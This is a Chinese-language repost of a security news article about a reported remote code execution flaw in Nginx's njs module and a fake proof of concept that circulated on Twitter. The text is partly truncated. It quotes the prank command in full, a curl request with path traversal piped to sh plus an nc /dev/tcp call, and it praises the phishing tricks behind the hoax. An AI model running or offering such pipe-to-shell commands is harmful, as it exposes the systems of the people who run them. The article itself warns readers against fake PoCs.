龙空技术网

Nginx的njs插件被爆远程代码执行漏洞,务必警惕网上假poc

青藤云安全QINGTENG 144

前言:

如今兄弟们对“nginx远程漏洞溢出”大约比较关心,姐妹们都想要学习一些“nginx远程漏洞溢出”的相关文章。那么小编也在网摘上搜集了一些对于“nginx远程漏洞溢出””的相关内容,希望我们能喜欢,姐妹们一起来了解一下吧!

njs 是 JavaScript/ECMAscript 的子集 。它实现了大部分的 JavaScript 语言的功能,没有完全遵从 ECMAScript 标准,同时抛弃了 JavaScript 比较难懂的部分。njs 不是通过 V8 引擎实现的,而是通过一个更小、能耗更低、更符合 Nginx 应用场景的小虚拟机(VM)来实现,可以理解为 Nginx 为其实现了一套自己的词法解析。

njs 是以 Nginx 插件的方式存在,名字就叫:njs 。和其他 Nginx 插件一样,我们需要重新编译 Nginx 来完成安装。

而在近日,njs插件被安全研究员Alisa Shevchenko

Nginx 也在回复中声明,ZDI-CAN-8296 was fixed in the nJS 0.3.2 release。

并附带了两个链接。

也就是下面这个github issues中提到的问题,从中也许你们可以找到一些线索去发现和构造。

热心网友甚至还给出了patch方法

由于Nginx在自2009年以来的,仅发现了大约20个漏洞,其中没有一个RCE漏洞。

因此导致此次事件的关注程度在web安全界的得到了轰炸。

甚至不亚于CVE-2019-0708的火爆程度

因此,戏精再次出现,外网一位安全研究员发布了一个POC。

然后该条推文得到了疯狂转发。

再转发得到600多量后,作者发布了一篇文章。

文章里面完全披露了他是如何构造一个假的poc从开玩笑

同时,他也解释了这条语句的含义,黑鸟还是从中学到了一些技巧,也算是感谢他这波教你做人了。

curl -gsS (link: ) victim.server.here/../../../%00/n…\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

除此之外,还教导了一些钓鱼的思路,也是很骚,怪不得能钓到这么多人,也是奇才。

不过恐怕,昨天的流传POC已经出现,说的就是这个玩意吧。

再次强调:目前公开渠道并未披露任何细节(除Gayhub外)。

本文转自公众号:黑鸟,如需转载请标明。

标签: #nginx远程漏洞溢出 #nginx插件大全 #nginx njs 性能